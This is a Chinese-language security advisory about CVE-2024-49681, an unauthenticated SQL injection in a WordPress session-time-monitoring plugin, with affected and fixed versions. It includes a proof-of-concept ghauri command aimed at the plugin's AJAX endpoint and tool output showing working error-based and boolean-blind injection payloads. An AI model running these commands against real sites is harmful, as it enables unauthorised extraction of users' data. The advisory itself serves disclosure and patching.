首页 网络安全 正文
  • 本文约2365字,阅读需12分钟
  • 201
  • 0

WordPress插件会话时间监控SQL注入漏洞CVE-2024-49681

摘要

栋科技漏洞库关注到 WP Sessions Time Monitoring Full Automatic 插件发布版本更新,修复CVE-2024-49681漏洞,漏洞CVSS评分9.3。

WordPress 是一款功能多样的出色 CMS(内容管理系统),目前提供超过 45,000 个免费插件和海量付费插件,帮助用户增强网站功能。

借助合适的插件,WordPress网站管理者可以将 WordPress 从简单的博客平台转变为功能强大且灵活的自定义网站,实现更多复杂功能。

WordPress插件是一小段软件,用户可以通过网站后台管理面板或者通过FTP功能将这些插件安装到网站,然后通过管理面板启用并使用。

WP Sessions Time Monitoring Full Automatic plugin 插件功能非常强大, 可以跟踪用户在特定页面准确活动时间、跟踪用户的阅读时间。

当然也可以跟踪编辑时间、 跟踪书写时间 、跟踪访问时间 、跟踪元件或工作时间以及跟踪精确的会话时间,对于用户画像分析至关重要。

一、基本情况

WP Sessions Time Monitoring Full Automatic plugin是一个适用于WordPress的插件,用于监控和记录用户在WordPress网站花费的时间。

WP Sessions Time Monitoring Full Automatic plugin插件可以帮助网站管理员分析用户的行为和参与度,现有资料显示这款插件并非开源。

WordPress插件会话时间监控SQL注入漏洞CVE-2024-49681

栋科技漏洞库关注到 WP Sessions Time Monitoring Full Automatic 插件发布版本更新,修复CVE-2024-49681漏洞,漏洞CVSS评分9.3。

二、漏洞分析

CVE-2024-49681漏洞源于WP Sessions Time Monitoring Full Automatic v1.0.9对用户提供的参数转义不充分及对现有SQL查询准备不足。

该漏洞允许Automatic SQL注入,使得未经身份验证的攻击者能够将附加的SQL查询附加到现有的查询中,从而在数据库中提取敏感信息。

攻击者如果成功利用CVE-2024-49681漏洞,可以获得对网站的敏感数据的未经授权的访问,因此,这意味着用户数据的完整性受到威胁。

CVE-2024-49681漏洞POC

ghauri -u http://kubernetes.docker.internal/wp-admin/admin-ajax.php --data="action=activitytime_action&uri=test" -p uri --dbms mysql --dbs

  ________.__                        .__  {1.3.8}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.

[*] starting @ 15:23:38 /2024-11-09/

[15:23:38] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: dbid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: action=activitytime_action&uri=test

Parameter: uri (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
    Payload: action=activitytime_action&uri=test' AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)-- wXyW

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=activitytime_action&uri=test' AND 08875=8875-- wXyW
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dbid  (default)
[1] place: POST, parameter: uri

值得关注的是,WP Sessions Time Monitoring Full Automatic v1.0.9之前版本还能爆出过其他SQL注入漏洞,漏洞追踪为CVE-2023-5203。

CVE-2023-5203源于在SQL 查询中使用请求URL或查询参数之前未对其进行清理,未经身份验证的攻击者可通过SQL时间盲注窃取信息。

当然,未经身份验证的威胁攻击者也可以在某些情况下使用报错/union联合注入,也可以实现从数据库中获取敏感信息,但漏洞未获评级。

三、影响范围

WordPress WP Sessions <= 1.0.9

四、修复建议

WordPress WP Sessions >= 1.1.0

五、参考链接

https://patchstack.com/database/vulnerability/activitytime/wordpress-wp-sessions-time-monitoring-full-automatic-plugin-1-0-9-sql-injection-vulnerability



扫描二维码,在手机上阅读
评论
更换验证码
友情链接